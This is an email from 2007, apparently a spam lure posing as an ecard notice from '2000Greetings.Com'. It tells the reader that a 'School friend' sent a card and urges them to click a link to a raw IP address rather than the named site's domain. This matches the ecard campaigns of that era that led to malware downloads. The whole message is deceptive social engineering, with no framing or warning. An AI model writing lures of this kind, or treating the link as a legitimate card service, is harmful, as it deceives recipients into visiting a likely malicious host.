Subject: School friend sent you an ecard from 2000Greetings.Com!

From: "2000Greetings.Com" <[email-masked]>
Date: Fri, 10 Aug 2007 10:07:38 -0500

School friend has created a postcard for you at 2000Greetings.Com,
the Internet's most popular greeting card service. 

Your greeting card ID is: 0099675c50080d0229e368412571d7d419 

To see your custom greeting card, simply click on the link below: 
http://65.28.130.104/?0099675c50080d0229e368412571d7d419

Send greeting cards from 2000Greetings.Com whenever you want by visiting us at: 
http://2000Greetings.Com/
Copyright (c) 1996-2007 2000Greetings.Com All Rights Reserved